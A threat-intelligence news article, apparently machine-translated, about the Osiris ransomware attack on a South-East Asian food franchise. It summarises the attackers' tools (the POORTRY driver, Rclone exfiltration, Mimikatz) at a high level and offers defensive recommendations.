Osiris the new threat of ansomware that raises privileges and exfiltrates in the cloud and numbers with a hybrid cipher

In November 2025, a large food service franchise company in South-East Asia was hit by a new family of ransomware that experts have baptized as Osiris. Although it shares a name with an old variant related to Locky, this version has no technical connection to that 2016 malware: it is a new threat in behavior and code, detected by the Symantec and Carbon Black (Broadcom) Threat Hunting team. To understand why this incident arouses so much attention, you have to focus on both the sophistication of the encryption and the chain of tools and techniques prior to encryption.

One of the most striking elements of the attack was the use of a malicious driver called POORTRY. Instead of reusing a legitimate but vulnerable driver - the practice known as "bringing your own vulnerable driver" (BYOVD) - POORTRY seems to have been created ad hoc for raise privileges and disable security solutions. This tactic makes it easier for the attacker to disable defensive processes without relying on legitimate drivers with known failures; a variation that complicates detection and response. Broadcom / Carbon Black report also comments on the use of a tool called KillAV and the activation of RDP in the compromised environment, measures that help to strengthen remote control and to neutralize countermeasures.

Before the cipher came into action, the intruders removed sensitive information using Rclone and turned it into a storage bucket in the cloud of Wasabi. This pattern - pre-encryption exfiltration - is becoming more and more common: the threat is no longer just that the data is inaccessible by the encryption, but that they can also be publicly leaked as additional pressure to pay for the rescue. In this case the use of a version of Mimikatz whose executable had the same file name (kaz.exe) that had been observed in incidents related to INC ransomware, suggesting possible connections between operators or tool reuse.

From a technical point of view, Osiris has been described as an effective and flexible cipher. It uses a hybrid encryption scheme and generates different keys for each file, which complicates recovery without the corresponding private key. It also allows to stop specific services, select folders and extensions to cipher, force process closure and leave a rescue note. By default it tries to close a long list of services and processes related to office suites, mail servers, browsers and back-up and volume copy solutions - further irritating recovery and continuity equipment -.

The intrusion also showed intense use of dual and remote management tools: from scanners and utilities to run remote commands to legitimate access agents adapted or customized, as a modified version of Rustdesk. These utilities, valid in defensive hands, become attack tools when operators with privileges use them to move laterally, collect credentials and deploy malicious loads. The pattern observed in this incident - internal recognition, cloud exfiltration, use of drivers to deactivate security and finally deployment of the cipher - fits with well-coordinated modern attack chains.

The general picture of 2025 shows that Ransomware remains a persistent and evolving threat. The leak data published by extortion groups recorded thousands of victims, with a slight increase each year, and well-known actors continue to operate, mutate or associate with each other. Groups such as Akira, LockBit and others have shown recent tactics ranging from the exploitation of vulnerabilities and the lateral load through loaders to the use of vulnerable drivers to evade defenses. If you want to go into some of these campaigns and techniques, there are detailed public analyses of companies such as Palo Alto Unit 42 about new families, or Coveware about cryptographic implementations failures that turn certain attacks into definitive data loss: analysis of Sicarii, 01flip documentation and the description of the incidence with Obscura that generated irreversible loss of files by a failure in the encryption process, according to Coveware.

From a defensive perspective there are clear lessons. Limiting remote access and applying multifactor authentication are basic but effective measures, especially for services such as RDP that have been repeatedly exploited. It is equally important to monitor the use of legitimate administration and forensic tools within the network, and to have enabling policies that reduce unauthorized binary execution. Having off-site and immutable backup and practicing recovery plans also reduces the attacker's options and allows the organization to recover without giving in to extortion.

Beyond the technical response, the Osiris case recalls that data extortion has evolved: encryption can only be part of the coercive scheme. Infiltration of information, public dissemination of stolen data and combination of cryptographic and non-cryptographic threats expand the risk framework for companies of all sizes. The usual recommendations - updating and patching systems, segmenting networks, auditing permits and telemetry, and educating teams - remain the most effective to reduce the attack surface.

For security officials and for any organization with critical assets, this incident provides a reminder of the need to maintain a comprehensive strategy: detection and response tools, strict access controls, proven backup and a tuned incident response capacity. Threats are not only recycled; they are reinvented with new pieces such as POORTRY and exfiltration chains to cloud services, so the defense must be adapted with the same speed. If you want to review the technical reports and analyses mentioned in this article, you can consult the report shared by Broadcom / Symantec and the public analysis of actors and campaigns in specialized sources such as Security.com / Broadcom, ReliaQuest and studies Unit 42 and Coveware to deepen the most recent trends.